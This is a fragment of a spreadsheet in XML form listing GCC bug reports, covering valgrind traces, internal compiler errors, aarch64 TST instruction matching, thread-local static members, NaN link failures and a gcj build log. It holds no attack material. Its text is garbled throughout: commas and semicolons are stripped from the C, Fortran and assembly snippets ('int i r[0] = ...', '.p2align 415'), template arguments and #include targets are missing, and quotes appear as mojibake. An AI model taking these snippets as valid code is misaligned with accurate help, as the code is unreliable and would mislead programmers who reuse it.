(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296==    by 0x3C07E94A: std::ostreambuf_iterator 
&gt; std::num_put &gt; 
&gt;::_M_convert_int(std::ostreambuf_iterator 
&gt; std::ios_base&amp; char long) const 
(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296==    by 0x3C07E4CF: std::num_put&lt;char std::ostreambuf_iterator&lt;char 
std::char_traits &gt; &gt;::do_put(std::ostreambuf_iterator&lt;char 
std::char_traits &gt; std::ios_base&amp; char long) const 
(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296== 
==296== Conditional jump or move depends on uninitialised value(s) 
==296==    at 0x3C07D9DD: std::__pad 
&gt;::_S_pad(std::ios_base&amp; char char* char const* int int bool) 
(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296==    by 0x3C07DA83: std::num_put&lt;char std::ostreambuf_iterator&lt;char 
std::char_traits &gt; &gt;::_M_pad(char int std::ios_base&amp; char* char 
const* int&amp;) const 
(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296==    by 0x3C07E94A: std::ostreambuf_iterator 
&gt; std::num_put &gt; 
&gt;::_M_convert_int(std::ostreambuf_iterator 
&gt; std::ios_base&amp; char long) const 
(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296==    by 0x3C07E4CF: std::num_put&lt;char std::ostreambuf_iterator&lt;char 
std::char_traits &gt; &gt;::do_put(std::ostreambuf_iterator&lt;char 
std::char_traits &gt; std::ios_base&amp; char long) const 
(in /pkg/gcc.2/lib/gcc-lib/i686-pc-linux-gnu/3.3.3/libstdc++.so.5.0.5) 
==296== 
==296== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 17 from 1) 
==296== malloc/free: in use at exit: 0 bytes in 0 blocks. 
==296== malloc/free: 2 allocs 2 frees 1138 bytes allocated. 
==296== For a detailed leak analysis  rerun with: --leak-check=yes 
==296== For counts of detected errors rerun with: -v 
andrew@bob andrew $</t>
  </si>
  <si>
    <t>GCC-44130</t>
  </si>
  <si>
    <t>[vect256] SLP failed to update stack alignment</t>
  </si>
  <si>
    <t>On vect256 branch I got
[hjl@gnu-6 prxxx]$ cat x.c
extern void abort (void)
static float Yf[] = { 2.0 -2.0 -2.0 -2.0 -2.0 2.0 -0.0 __builtin_inff () }
static const float Zf[] = { 1.0 -1.0 -1.0 -0.0 -0.0 0.0 -__builtin_inff () __builtin_nanf () }
void testf (void)
{
  float r[8]
  int i r[0] = __builtin_copysignf (1.0 Yf[0])
  r[1] = __builtin_copysignf (1.0 Yf[1])
  r[2] = __builtin_copysignf (-1.0 Yf[2])
  r[3] = __builtin_copysignf (0.0 Yf[3])
  r[4] = __builtin_copysignf (-0.0 Yf[4])
  r[5] = __builtin_copysignf (-0.0 Yf[5])
  r[6] = __builtin_copysignf (__builtin_inff () Yf[6])
  r[7] = __builtin_copysignf (-__builtin_nanf () Yf[7])
  for (i = 0 i &lt; 8 ++i)
    if (__builtin_memcmp (r+i Zf+i sizeof(float)) != 0)
      abort ()
}
[hjl@gnu-6 prxxx]$ make
/export/build/gnu/gcc-avx256/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-avx256/build-x86_64-linux/gcc/ -mavx -O2 -ftree-vectorize  -S x.c
[hjl@gnu-6 prxxx]$ cat x.s
	.file	x.c
	.text
	.p2align 415
.globl testf
	.type	testf @function
testf:
.LFB0:
	.cfi_startproc
	pushq	%rbp
	.cfi_def_cfa_offset 16
	xorl	%eax %eax
	movl	$4 %edx
	movq	%rsp %rbp
	.cfi_offset 6 -16
	.cfi_def_cfa_register 6
	subq	$32 %rsp
	vmovaps	.LC0(%rip) %ymm0
	movq	%rsp %r8
	vmovaps	%ymm0 (%rsp)
	.p2align 410
	.p2align 3
.L3:
	leaq	(%r8%rax) %rsi
	leaq	Zf(%rax) %rdi
	movq	%rdx %rcx
	repz cmpsb
	jne	.L6
	addq	$4 %rax
	cmpq	$32 %rax
	jne	.L3
	leave
	.cfi_remember_state
	.cfi_def_cfa 7 8
	ret
.L6:
	.cfi_restore_state
	call	abort
	.cfi_endproc
.LFE0:
	.size	testf .-testf
There is no stack alignment.</t>
  </si>
  <si>
    <t>GCC-21047</t>
  </si>
  <si>
    <t>ASSERT_EXPR handling in fold never triggers.</t>
  </si>
  <si>
    <t>According to tree.def ASSERT_EXPR belongs to tcc_expression.
When fold gets a tree node that is tcc_expressions
we do not get to the following switch statement.
  switch (code)
    {
    case CONST_DECL:
      return fold (DECL_INITIAL (t))
    case ASSERT_EXPR:
So the ASSERT_EXPR case never triggers.</t>
  </si>
  <si>
    <t>GCC-68796</t>
  </si>
  <si>
    <t>Make use of and-immediate+compare instructions more robust</t>
  </si>
  <si>
    <t>The aarch64 target (and others) has an instruction to perform a bitmask and compare the result for equality against zero: the TST instruction.
In config/aarch64/aarch64.md its pattern is represented as:
(define_insn *and3nr_compare0
  [(set (reg:CC_NZ CC_REGNUM)
	(compare:CC_NZ
	 (and:GPI (match_operand:GPI 0 register_operand %rr)
		  (match_operand:GPI 1 aarch64_logical_operand r))
	 (const_int 0)))]
  tst\\t%0 %1
  [(set_attr type logics_reglogics_imm)]
)
We should be utilising it more than we are at the moment.
Some examples where we should be using it but are not:
int
f8 (int x)
{
  if (x &amp; 8)
    return 1
  return x
}
for -O2 on an aarch64 toolchain we generate:
f8:
        and     w1 w0 8
        cmp     w1 wzr
        csinc   w0 w0 wzr eq
        ret
when we could be doing:
f8:
        tst     x0 8
        csinc   w0 w0 wzr eq
        ret
Combine tries to match some patterns like:
(set (reg:CC 66 cc)
    (compare:CC (zero_extract:DI (reg:DI 0 x0 [ x ])
            (const_int 1 [0x1])
            (const_int 3 [0x3]))
        (const_int 0 [0])))
and
(set (reg:CC 66 cc)
    (compare:CC (and:DI (lshiftrt:DI (reg:DI 0 x0 [ x ])
                (const_int 3 [0x3]))
            (const_int 1 [0x1]))
        (const_int 0 [0])))
but not the and-immediate case for which we have a pattern.
Now the documentation in md.texi on the topic of canonicalization says this:
 Equality comparisons of a group of bits (usually a single bit) with zero
  will be written using @code{zero_extract} rather than the equivalent
  @code{and} or @code{sign_extract} operations.
So the aarch64 port is arguably at fault here for not providing the canonical form here.
Indeed adding a pattern that matches something like:
  [(set (reg:CC_NZ CC_REGNUM)
	(compare:CC_NZ
	 (zero_extract:GPI (match_operand:GPI 0 register_operand r)
		  (match_operand:GPI 1 const_int_operand n)
		  (match_operand:GPI 2 const_int_operand n))
	 (const_int 0)))]
and converts operands 1 and 2 into the appropriate bitmask for the TST instruction works
(with an appropriate change to the SELECT_CC_MODE implementation for aarch64 to allow the zero_extract case).
However consider the case where we have an immediate that corresponds to the mode mask of a short mode like QImode:
int
f255 (int x)
{
  if (x &amp; 255)
    return 1
  return x
}
Again we generate:
f255:
        and     w1 w0 255
        cmp     w1 wzr
        csinc   w0 w0 wzr eq
        ret
instead of:
f255:
        tst     w0 255
        csinc   w0 w0 wzr eq
        ret
even with the zero_extract pattern in place.
Here combine doesn't try to match a zero-extract variant nor an AND-immediate form.
It creates a QImode subreg of the operand and tries to perform the comparison in the shortest mode.
That is it tries to match:
(set (reg:CC_ZESWP 66 cc)
    (compare:CC_ZESWP (reg:QI 0 x0 [ x ])
        (const_int 0 [0])))
For which we have no pattern.
Again I could add a pattern to aarch64.md to match something like:
(define_insn *and_compare0
  [(set (reg:CC_NZ CC_REGNUM)
	(compare:CC_NZ
	 (match_operand:SHORT 0 register_operand r)
	 (const_int 0)))]
where SHORT is a mode iterator over QImode and HImode and generate a TST instruction with the mode mask and modify
SELECT_CC_MODE appropriately.
However it seems to me that the general and-immediate+compare form of the instruction should be matched more robustly
rather than having to specify all the different equivalent forms in the MD files.
Making the above changes to the aarch64 backend ends up generating 42% more tst instructions across SPEC2006 and ends up reducing
the number of cmp instructions generated by about 9% and the generated code always looks simpler due to us avoiding performing an
AND-immediate operation followed by a compare or a compare+branch.
Is there any way we can make combine try harder to match these equivalent forms?
Or should we go ahead and add these equivalent forms of the and-immediate+compare pattern?
I think adding a pattern to handle the zero_extract case is not unreasonable since the canonicalization rules dictate it
but for the second case perhaps we should not be trying short subregs for which there is no native instruction</t>
  </si>
  <si>
    <t>GCC-49023</t>
  </si>
  <si>
    <t>ICE on invalid code with C_ASSOCIATED</t>
  </si>
  <si>
    <t>Hi list
when messing around with C_ASSOCIATED I got an ICE with this bit of invalid code using stock gfortran on Ubuntu 10.4
----------------- 8&lt; -----------------
PROGRAM test
  USE INTRINSIC :: iso_c_binding
  IMPLICIT NONE
  TYPE (C_PTR) :: x y
  PRINT * C_ASSOCIATED([xy])  ! wrong: C_ASSOCIATED is not ELEMENTAL
END PROGRAM test
----------------- 8&lt; -----------------
$ gfortran -v
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.4.3-4ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --program-suffix=-4.4 --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i486 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5)
valgrind says
valgrind /usr/lib/gcc/x86_64-linux-gnu/4.4.3/f951 /home/uni/tmp/test.f90 -dumpbase test.f90 -mtune=generic -auxbase test -fintrinsic-modules-path /usr/lib/gcc/x86_64-linux-gnu/4.4.3/finclude -o /tmp/ccMioHAS.s
==1488== Memcheck a memory error detector
==1488== Copyright (C) 2002-2009 and GNU GPL'd by Julian Seward et al.
==1488== Using Valgrind-3.6.0.SVN-Debian and LibVEX rerun with -h for copyright info
==1488== Command: /usr/lib/gcc/x86_64-linux-gnu/4.4.3/f951 /home/uni/tmp/test.f90 -dumpbase test.f90 -mtune=generic -auxbase test -fintrinsic-modules-path /usr/lib/gcc/x86_64-linux-gnu/4.4.3/finclude -o /tmp/ccMioHAS.s
==1488== 
==1488== Invalid read of size 8
==1488==    at 0x4FC5F2: ??? (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x4F95C1: gfc_resolve_expr (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x4FFC22: ??? (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x5031EB: gfc_resolve_blocks (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x4FFC02: ??? (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x5015C0: ??? (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x501604: gfc_resolve (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x4EFD5F: gfc_parse_file (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x520937: ??? (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x738FF1: toplev_main (in /usr/lib/gcc/x86_64-linux-gnu/4.4/f951)
==1488==    by 0x54FEC4C: (below main) (libc-start.c:226)
==1488==  Address 0x28 is not stack'd malloc'd or (recently) free'd
==1488== 
On a side note:
The example code at http://gcc.gnu.org/onlinedocs/gfortran/C_005fASSOCIATED.html
puzzles me. Shouldn't the message read 'b and a DO point to the same target'?
Cheers
Dennis</t>
  </si>
  <si>
    <t>dennis.wassel</t>
  </si>
  <si>
    <t>GCC-27332</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in try_interchange_loops with -ftree-loop-linear</t>
  </si>
  <si>
    <t>Tests gap and twolf from SPEC CPU2000 ICE when built on powerpc64-linux with -O2 -ftree-loop-linear and either -m32 or -m64.  A third test lucas started getting segfaults for those options at the same time.  A regression hunt using a minimized testcase (to be attached) identified this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=112437
    r112437 | spop | 2006-03-28 04:19:26 +0000 (Tue 28 Mar 2006)
Output compiling the minimized testcase:
elm3b145% /opt/gcc-nightly/trunk/bin/gcc -O2 -ftree-loop-linear -c uloop.c
uloop.c: In function â€˜fooâ€™:
uloop.c:3: internal compiler error: vector VEC(ddr_pbase) index domain error in try_interchange_loops at tree-loop-linear.c:183
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-27729</t>
  </si>
  <si>
    <t>Field Method and Constructor need isSynthetic() implemetation</t>
  </si>
  <si>
    <t>Field Method and Constuctor currently have a isSynthetic() implementation that always returns false. They need a real implementation.</t>
  </si>
  <si>
    <t>GCC-8209</t>
  </si>
  <si>
    <t>Failure to detect negative bit-field size (!)</t>
  </si>
  <si>
    <t>The bug was verified to be still present in yesterday's
CVS (Oct 12): 
If you compile the following code: 
  struct A
  {
      int : (-1)
  }
you get the (correct) _error_ 
  negative width in bit-field `A::'
Now if you compile
  struct A
  {
    int : (sizeof(int)-5)
  }
then you just get the _warning_
warning: width of `A::' exceeds its type
which is incorrect. 
As a result sizeof(A) turns out to be 536870912
(500Mb).
Release:
3.2.1 20021007 (prerelease) and many more
Environment:
linux-elf
How-To-Repeat:
Just compile the four-liner above.</t>
  </si>
  <si>
    <t>GCC-6758</t>
  </si>
  <si>
    <t>ICE on nested type in template declaration</t>
  </si>
  <si>
    <t>The code compiled and worked on M$ VC6 SP5 and I'm pretty sure it's legal
(although more indirect than useful).
I verified with truss that I'm only using gcc-3.0.4 headers.
Release:
3.0.4
Environment:
System: SunOS zweistein 5.6 Generic_105181-20 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ../gcc-3.0.4/configure  : (reconfigured) ../gcc-3.0.4/configure --with-gnu-ld
How-To-Repeat:
Compile this:
        #include 
        #include 
        template  class Foo {
            typedef std::map::allocator_type::reference bar
        }</t>
  </si>
  <si>
    <t>GCC-19450</t>
  </si>
  <si>
    <t>__thread static class members</t>
  </si>
  <si>
    <t xml:space="preserve">
gcc generates incorrect code for static members in some cases.  Consider the
following code:
struct C {
        static __thread int x
        static __thread int y
}
__thread int C::x
void g() {
        int z = C::x
        z = C::y
}
When this is compiled on an x86 machine with gcc -S the body of g() is
translated as:
        movl    %gs:_ZN1C1xE@NTPOFF %eax
        movl    %eax -4(%ebp)
        movl    _ZN1C1yE %eax
        movl    %eax -4(%ebp)
note that C::x is accessed using an offset from the thread pointer which
is correct.  C::y however is accessed as if it were an ordinary (not
thread-local) static member which is incorrect.  I have also observed
this problem on ia64 machines so it seems to be a general issue.
These are similar to the symptoms described in bug 13668 although that was
determined to be a glibc issue.  I see no way in which glibc could be
involved here.
Environment:
System: Linux algol.uwaterloo.ca 2.6.8-1-k7 #1 Thu Nov 25 04:13:37 UTC 2004 i686 GNU/Linux
Architecture: i686
host: i486-pc-linux-gnu
build: i486-pc-linux-gnu
target: i486-pc-linux-gnu
configured with: ../gcc/configure -v --enable-languages=cc++ --prefix=/u/rcbilson/software/gcc --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug i486-linux
How-To-Repeat:
        Compile the above code fragment using gcc -S.</t>
  </si>
  <si>
    <t>GCC-57216</t>
  </si>
  <si>
    <t>error: definition in block 255 does not dominate use in block 252</t>
  </si>
  <si>
    <t>Created attachment 30061
C source code
I just tried to compile the package enigma-1.01-23
on gcc-4.9 trunk dated 20130508 on an AMD x86_64 box.
The compiler said
SDL_gfxPrimitives.c: In function 'ellipseColor':
SDL_gfxPrimitives.c:2317:5: error: definition in block 255 does not dominate use in block 252
 int ellipseColor(SDL_Surface * dst Sint16 x Sint16 y Sint16 rx Sint16 ry Uint32 color)
     ^
for SSA_NAME: ypj_393 in statement:
slsr_219 = ypj_393 - oi_341
SDL_gfxPrimitives.c:2317:5: internal compiler error: verify_ssa failed
0xa7d781 verify_ssa(bool)
    ../../src/trunk/gcc/tree-ssa.c:1046
0x859101 execute_function_todo
    ../../src/trunk/gcc/passes.c:1970
0x859ac7 execute_todo
    ../../src/trunk/gcc/passes.c:2002
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-2320</t>
  </si>
  <si>
    <t>incorrect order of destruction of function parameters</t>
  </si>
  <si>
    <t>According to ISO 14882:1998 paragraph 6.6/2: On exit from scope
(however accomplished) destructors are called for all constructed
objects with automatic storage duration (named objects or temporaries)
that are declared in that scope in the REVERSE order of their
declaration.  You will note that the objects 3 and 4 above are
destructed in the order of their declaration not the reverse order.
Release:
gcc version 2.95.2 19991024
Environment:
Windows 2000 CygWin 1.1.8
How-To-Repeat:
Compile function with:
    g++ --verbose orderdtors.cc -o order
Then execute program with
    order
Output is
A::A(): 1
B::B(): 2
A::A(A): 3
B::B(B): 4
A::~A(): 3
B::~B(): 4
B::~B(): 2
A::~A(): 1
The fourth and fifth lines should be inverted.</t>
  </si>
  <si>
    <t>james.kanze</t>
  </si>
  <si>
    <t>GCC-24096</t>
  </si>
  <si>
    <t>huge() returns infinity for long doubles</t>
  </si>
  <si>
    <t>powerpc64-linux powerpc-darwin and other targets that use the IBM extended
double format for long double currently fail gfortran.dg/large_real_kind_1.f90
due to huge() returning infinity.
Patch at http://gcc.gnu.org/ml/fortran/2005-09/msg00533.html</t>
  </si>
  <si>
    <t>GCC-7753</t>
  </si>
  <si>
    <t>Problems with  (signaling_Nan())</t>
  </si>
  <si>
    <t>gcc does not compile the file tnan.C. There are problems with the
functions returning the representations of SNANs QNANs and
Infinity.
Release:
3.3 20020828 (experimental)
Environment:
System: Linux kiste 2.4.18 #8 Sat Mar 9 15:33:15 CET 2002 i686 unknown
Architecture: i686
2.13.90.0.3 20020809
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit
How-To-Repeat:
source code tnan.C
#include 
#include 
using namespace std
int main()
{
  cout ::signaling_NaN() &lt;&lt; endl
  cout ::quiet_NaN() &lt;&lt; endl
  cout ::infinity() &lt;&lt; endl
  cout ::signaling_NaN() &lt;&lt; endl
  cout ::quiet_NaN() &lt;&lt; endl
  cout ::infinity() &lt;&lt; endl
  cout ::signaling_NaN() &lt;&lt; endl
  cout ::quiet_NaN() &lt;&lt; endl
  cout ::infinity() &lt;&lt; endl
}
Compiling tnan.C
 g++ -v -W -Wall tnan.C
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit
Thread model: posix
gcc version 3.3 20020828 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/cc1plus -quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D_GNU_SOURCE tnan.C -D__GNUG__=3 -quiet -dumpbase tnan.C -auxbase tnan -W -Wall -version -o /tmp/cczYDUy2.s
GNU C++ version 3.3 20020828 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.3 20020828 (experimental).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/c++/3.3
 /usr/local/include/c++/3.3/i686-pc-linux-gnu
 /usr/local/include/c++/3.3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o /tmp/ccXsHbC5.o /tmp/cczYDUy2.s
GNU assembler version 2.13.90.0.3 (i686-pc-linux-gnu) using BFD version 2.13.90.0.3 20020809
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/../../../../i686-pc-linux-gnu/lib -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/../../.. /tmp/ccXsHbC5.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/crtend.o /usr/lib/crtn.o
/tmp/ccXsHbC5.o: In function `std::numeric_limits::infinity()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIfE8infinityEv+0x7): undefined reference to `std::__glibcpp_float_infinity'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::quiet_NaN()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIfE9quiet_NaNEv+0x7): undefined reference to `std::__glibcpp_float_QNaN'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::signaling_NaN()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIfE13signaling_NaNEv+0x7): undefined reference to `std::__glibcpp_float_SNaN'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::infinity()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIdE8infinityEv+0x5): undefined reference to `std::__glibcpp_double_infinity'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::quiet_NaN()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIdE9quiet_NaNEv+0x5): undefined reference to `std::__glibcpp_double_QNaN'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::signaling_NaN()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIdE13signaling_NaNEv+0x5): undefined reference to `std::__glibcpp_double_SNaN'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::infinity()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE8infinityEv+0x7): undefined reference to `std::__glibcpp_long_double_infinity'
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE8infinityEv+0xd): undefined reference to `std::__glibcpp_long_double_infinity'
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE8infinityEv+0x13): undefined reference to `std::__glibcpp_long_double_infinity'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::quiet_NaN()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE9quiet_NaNEv+0x7): undefined reference to `std::__glibcpp_long_double_QNaN'
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE9quiet_NaNEv+0xd): undefined reference to `std::__glibcpp_long_double_QNaN'
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE9quiet_NaNEv+0x13): undefined reference to `std::__glibcpp_long_double_QNaN'
/tmp/ccXsHbC5.o: In function `std::numeric_limits::signaling_NaN()':
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE13signaling_NaNEv+0x7): undefined reference to `std::__glibcpp_long_double_SNaN'
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE13signaling_NaNEv+0xd): undefined reference to `std::__glibcpp_long_double_SNaN'
/tmp/ccXsHbC5.o(.gnu.linkonce.t._ZNSt14numeric_limitsIeE13signaling_NaNEv+0x13): undefined reference to `std::__glibcpp_long_double_SNaN'
collect2: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-30454</t>
  </si>
  <si>
    <t>[4.3 Regression] empty zip file in class path can cause leakage of file streams</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/gcc/gcj -B/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libjav
a/ -B/test/gnu/gcc/objdir/gcc/ -fclasspath= -fbootclasspath=../../../gcc/libjava
/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -c -f
source-filename=/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libjava/classpath/lib
/classes -MT gnu/javax/crypto/jce.lo -MD -MP -MF gnu/javax/crypto/jce.deps @gnu/
javax/crypto/jce.list -fPIC -o gnu/javax/crypto/.libs/jce.o
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java: In cla
ss 'gnu.javax.crypto.jce.GnuCrypto$1':
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java: In met
hod 'gnu.javax.crypto.jce.GnuCrypto$1.run()':
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:431: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacSHA512Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:431: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacSHA512Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:433: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacTigerSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:433: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacTigerSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:435: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacHavalSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:435: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacHavalSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:437: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacWhirlpoolSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:437: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.HMacWhirlpoolSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:438: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.TMMH16Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:438: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.TMMH16Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:439: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.UHash32Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:439: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.UHash32Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:440: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.UMac32Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:440: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.UMac32Spi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:443: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacAnubisImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:443: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacAnubisImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:445: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacBlowfishImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:445: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacBlowfishImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:447: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacCast5Impl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:447: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacCast5Impl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:449: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacDESImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:449: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacDESImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:451: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacKhazadImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:451: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacKhazadImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:453: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacRijndaelImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:453: er
